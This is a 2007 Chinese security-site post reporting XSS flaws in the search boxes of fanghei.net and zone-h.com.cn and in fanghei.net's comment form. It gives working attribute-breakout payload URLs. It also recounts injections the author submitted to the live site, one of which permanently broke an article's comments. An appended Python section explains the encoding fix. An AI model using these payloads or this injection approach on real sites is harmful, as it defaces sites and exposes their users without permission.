China Fanghei Net (中国防黑网) XSS vulnerability security report - vulnerability warning - Black Bar Safety Net (黑吧安全网)

2007-03-26T00:00:00
ID MYHACK58:62200714726
Type myhack58
Reporter Anonymous (佚名)
Modified 2007-03-26T00:00:00

Description

China Fanghei Net (www.fanghei.net) is a network security site and the old home of www.zone-h.com.cn. Does a site like that really have no bugs at all? Let us look at it from the cross-site scripting (XSS) angle.

1. XSS in search.php. XSS in a site's search file is very common, and Fanghei's search.php is no exception. Judging by its input handling, the file is a little more careful than most, but it still does not escape XSS. The usual method: in the homepage article search box, type <script>alert(/lszm/)</script>. I wanted to enter the whole payload, but the box would not take it: the input box has a length limit (maxLength=20 in the source below), so a payload that long cannot be typed in. So first check whether the keyword is reflected into the URL: enter <> and submit. The generated URL is: http://www.fanghei.net/search.ph ... mit=+%CB%D1+%CB%F7+

Viewing the page source gives this:


CODE:

</TR> <TR> <TD height=40 align=center><INPUT maxLength=20 size=20 name=keywords value="<>"> <select name="btype" id="btypeid" onchange=redirect(this.options.selectedIndex) class="input1-bor"> <option value='0'>categories</option>

So our characters come through unchanged into the value attribute, and the keyword is taken straight from the URL. That means the XSS URL can be constructed directly, so I submit: http://www.fanghei.net/search.php?type=title&keywords=<script>alert(/lszm/)</script> No XSS effect appears. That is expected; many sites behave this way, so view the source:


CODE:

</TR> <TR> <TD height=40 align=center><INPUT maxLength=20 size=20 name=keywords value="<script>alert(/lszm/)</script>"> <select name="btype" id="btypeid" onchange=redirect(this.options.selectedIndex) class="input1-bor"> <option value='0'>categories</option>

As you can see, the script was inserted completely unchanged. It does not run only because it sits inside the quotes of the value="..." attribute, so the browser reads it as attribute text rather than as a tag. That is easy to deal with: close the attribute and the tag first, then open the script. Construct the URL again: http://www.fanghei.net/search.php?type=title&keywords="><script>alert(/lszm/)</script><" After submitting, the long-awaited XSS effect finally appears: (screenshot not reproduced)

2. Comment XSS. Looking further around the site, I found a new world: articles can be commented on. Open the comment form, enter <> in both the name and the content field, submit, and view the source:


CODE:

tyle="LEFT: 0px; WIDTH: 580px; WORD-WRAP: break-word">asdfas</td></tr> <tr><td bgcolor="#F6EDC2"><span class="style3"><></span> ( <span class="style5">2007-03-11</span> )</td></tr><tr><td bgcolor="#F5F5F5" style="LEFT: 0px; WIDTH: 580px; WORD-WRAP: break-word"><></td></tr> </table>

As you can see, the content field is encoded on output, but the name field in front of it is not; the programmer missed it. So comment again: enter <script>alert(/lszm/)</script> in the name field and write anything at all in the content field. Submit and refresh the page. No XSS effect appears, but the page is now broken: from that comment onward, nothing is displayed any more. (screenshot not reproduced) View the source:


CODE:

<table width="100%" border="0" cellpadding="5" cellspacing="1" bgcolor="#D8D8D8"> <tr><td bgcolor="#F6EDC2"><span class="style3"><script>alert(/lszm/</span> ( <span class="style5">2007-03-11</span> )</td></tr><tr><td bgcolor="#F5F5F5" style="LEFT: 0px; WIDTH: 580px; WORD-WRAP: break-word">zxvasdv</td></tr> </table>

So my <script> was not escaped but cut short: the name was stored as <script>alert(/lszm/ with the rest, including the closing tag, dropped. An opened <script> that is never closed makes the browser treat everything after it, including every later comment, as script source, so none of it is rendered. I thought of N different ways and still never got a working XSS out of it, but the damage is done: the article can no longer be commented on, which is not a small thing. Since the comment box would not give a working script, would an iframe work? With that in mind I went to another article (not the one whose comments I had already broken) and entered: <iframe src=http://www.zmke.com width=999 height=999></iframe> After submitting, it displays like this: (screenshot not reproduced) Why does the page not display properly? Check the source again:


CODE:

<tr><td bgcolor="#F6EDC2"><span class="style3"><iframe src=http://w</span> ( <span class="style5">2007-03-11</span> )</td></tr><tr><td bgcolor="#F5F5F5" style="LEFT: 0px; WIDTH: 580px; WORD-WRAP: break-word"> "asdfasdf" </td></tr>

Reading the code above: although the name input box has no client-side length limit, the script that validates the submission evidently enforces one and simply discards the excess (both truncated fragments, <script>alert(/lszm/ and <iframe src=http://w, are exactly 20 characters long). Breaking out that way is really hard. The destructive effect is still there, though: the comments no longer display as a web page, and the broken <iframe ...> tag is already sitting in the page's markup.

3. ZONE-H XSS. Since the old home of zone-h has XSS, the site's designers apparently never gave XSS a thought, so zone-h itself may be cross-site-able too. Open its page; the first thing you see is the search box for defaced pages. Enter directly: '><script>alert(/lszm/)</script><' Submit, and the resulting URL is http://www.zone-h.com.cn/?key=%2 ... amp;Submit=+Search+ and the XSS effect is there as well: (screenshot not reproduced)
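The three findings above come down to two output-encoding mistakes: search.php (section 1) and the zone-h search box (section 3) echo the keyword into a quoted attribute without encoding, so a payload that first closes the quote and the tag runs, while the comment template (section 2) truncates the name field instead of encoding it, so a cut-off <script> swallows the rest of the page. The following is an added example, not code from the original post or from either site; the two render functions are hypothetical reconstructions of the templates shown in the report, and NAME_MAX_LEN = 20 is inferred from the two 20-character fragments rather than confirmed site code. The tokenizer follows only the HTML tokenizer rules the report needs: a quoted attribute value hides a '<' or '>' from the tag scanner, and text after <script> is raw until '</script'.

```python
import html

# Server-side length the comment "name" field appears to be cut to: both truncated fragments
# in the report ("<script>alert(/lszm/" and "<iframe src=http://w") are exactly 20 characters.
# Inferred from the page, not confirmed site code.
NAME_MAX_LEN = 20


def render_search(keywords, quote='"', encode=False):
    """Hypothetical reconstruction of the search.php pattern: the submitted keyword is echoed
    into a quoted value attribute. encode=False echoes it verbatim (the behaviour reported);
    encode=True attribute-encodes it, which is what htmlspecialchars($s, ENT_QUOTES) does in PHP."""
    value = html.escape(keywords, quote=True) if encode else keywords
    return '<INPUT maxLength=20 size=20 name=keywords value=%s%s%s>' % (quote, value, quote)


def render_comment(name, body, encode_name=False):
    """Hypothetical reconstruction of the comment template: the body is encoded, the name is
    only truncated to NAME_MAX_LEN (the behaviour reported) unless encode_name is set."""
    name = name[:NAME_MAX_LEN]
    if encode_name:
        name = html.escape(name, quote=True)
    return ('<tr><td bgcolor="#F6EDC2"><span class="style3">%s</span> '
            '( <span class="style5">2007-03-11</span> )</td></tr>'
            '<tr><td bgcolor="#F5F5F5">%s</td></tr>' % (name, html.escape(body, quote=True)))


def tokenize(markup):
    """Minimal HTML tokenizer: '<' followed by a letter opens a tag, '>' inside a quoted
    attribute value does not close it, and everything after <script> is raw text until
    '</script'. Returns (start tag names seen, index where an unterminated <script> began
    swallowing the rest of the document, or None)."""
    tags = []
    low = markup.lower()
    i, n = 0, len(markup)
    while i < n:
        if markup[i] == '<' and i + 1 < n and markup[i + 1].isalpha():
            j = i + 1
            while j < n and markup[j].isalnum():
                j += 1
            name = low[i + 1:j]
            quote = None
            while j < n:                 # scan to the end of the tag, honouring quotes
                c = markup[j]
                if quote:
                    if c == quote:
                        quote = None
                elif c in '"\'':
                    quote = c
                elif c == '>':
                    break
                j += 1
            tags.append(name)
            i = j + 1
            if name == 'script':
                end = low.find('</script', i)
                if end == -1:
                    return tags, i       # script data state never ends: rest of page is "script"
                i = end
        else:
            i += 1
    return tags, None


def emits_script_tag(markup):
    """True when the browser sees a real <script> start tag, not text inside an attribute."""
    return 'script' in tokenize(markup)[0]


def swallowed_by_open_script(markup):
    """The part of the page an unterminated <script> turns into (syntactically broken) script."""
    _, start = tokenize(markup)
    return '' if start is None else markup[start:]


if __name__ == '__main__':
    inside = '<script>alert(/lszm/)</script>'            # section 1, first attempt
    breakout = '"><script>alert(/lszm/)</script><"'      # section 1, working payload
    print('inside attribute runs:', emits_script_tag(render_search(inside)))
    print('breakout runs:', emits_script_tag(render_search(breakout)))
    print('breakout after encoding:', emits_script_tag(render_search(breakout, encode=True)))
    # section 2: a truncated name swallows the comment that follows it
    page = render_comment(inside, 'zxvasdv') + render_comment('lszm', 'second comment')
    print('swallowed:', swallowed_by_open_script(page)[:60], '...')
```

The lesson the three findings share is that the fix is encoding for the output context, not length limits: html.escape with quote=True (or htmlspecialchars with ENT_QUOTES on the PHP side) neutralises both the double-quote breakout used on fanghei.net and the single-quote variant used on zone-h.com.cn, and once the name field is encoded a truncated payload is just text instead of a tag that hides every later comment.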

So the anti-hacking site has no fewer holes of its own. Sweating profusely......